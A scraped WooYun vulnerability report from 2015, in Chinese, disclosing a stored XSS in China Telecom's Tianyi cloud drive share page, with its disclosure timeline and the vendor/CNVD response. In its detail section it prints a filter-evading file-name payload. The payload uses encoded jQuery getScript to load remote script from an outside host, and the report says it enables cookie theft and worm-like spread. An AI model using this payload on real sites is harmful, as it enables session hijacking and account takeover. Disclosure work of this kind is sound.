中国电信天翼云网盘储存型xss(影响天翼用户中心旗下所有产品)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089555

漏洞标题：中国电信天翼云网盘储存型xss(影响天翼用户中心旗下所有产品)

漏洞作者： roker

提交时间：2015-01-04 12:21

修复时间：2015-02-18 12:22

公开时间：2015-02-18 12:22

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-04：细节已通知厂商并且等待厂商处理中
2015-01-09：厂商已经确认，细节仅向厂商公开
2015-01-19：细节向核心白帽子及相关领域专家公开
2015-01-29：细节向普通白帽子公开
2015-02-08：细节向实习白帽子公开
2015-02-18：细节向公众公开

简要描述：

中国电信天翼云网盘储存型xss ，影响天翼用户中心旗下所有产品。例如189邮箱，云通讯录。

详细说明：

http://cloud.189.cn/t/bayEZfFzqYva
上传文件。抓包修改文件名，分享后。发现在dom中有个输出点在这个位置

<script type="text/javascript">
    window.fileType = '输出点';
    window.mediaType = '4';
    window.largeUrl = '';
$(function () {
    //Share_App
    var Share_Title = '天翼云，超大容量、一云多端、私密空间、便捷分享。';
    var Share_Link = 'http://cloud.189.cn';
    var Share_Pic = '';
    var Share_App_Instance = Share_App($('#mood-app'), { title: Share_Title, link: Share_Link, pic: Share_Pic });
    $('#share_Btn_2').attr('stitle', Share_Title).attr('slink', Share_Link).attr('spic', Share_Pic);
    var Share_Btn_Instance = Share_Btn_App($('.share2btn'), { title: Share_Title, link: Share_Link, pic: Share_Pic,left:50 });
  });
// add mailto
var mailto = "mailto:cloud@189.cn";
//$('.reportBtn').attr('href', mailto);
$('.fileSize').text('文件大小：' + Util.fileSizeFormat('1452643'));
$('.shareDate').html('分享时间：' + '2014-12-31 18:57:47.0'.substring(0,19));
if($(".downloadUrl").val() != ''){
	$('.control-group').show();
}
//description start
//description end
if(isShowProfile){
	showProfile();
}else{
	hideProfile();
}
</script>

过滤了很多。。<> . / \ " 等等以及字符全转换为小写。但是还是有办法加载js的。中间的曲折测试过程就不说了。。。直接上代码~
抓包修改文件名

';$[unescape('get%2553cript')](unescape('%252f%252fheike%252eco%252f4m%2548h%2530%2550'));a='

可盗取用户cookie。可蠕虫自动重命名文件分享给好友。

获取的cookie可控制天翼用户中心旗下所有产品

漏洞证明：

修复方案：

过滤。

版权声明：转载请注明来源 roker@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-01-09 10:22

厂商回复：

CNVD确认所述情况，转由CNCERT向中国电信通报。

漏洞评价：

2015-01-05 22:16 | 牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )

前排顶爷爷

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089555

漏洞标题：中国电信天翼云网盘储存型xss(影响天翼用户中心旗下所有产品)

相关厂商：中国电信

漏洞作者： roker

提交时间：2015-01-04 12:21

修复时间：2015-02-18 12:22

公开时间：2015-02-18 12:22

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 roker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-089555

漏洞标题：中国电信天翼云网盘储存型xss(影响天翼用户中心旗下所有产品)

相关厂商：中国电信

漏洞作者： roker

提交时间：2015-01-04 12:21

修复时间：2015-02-18 12:22

公开时间：2015-02-18 12:22

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-089555"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 roker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：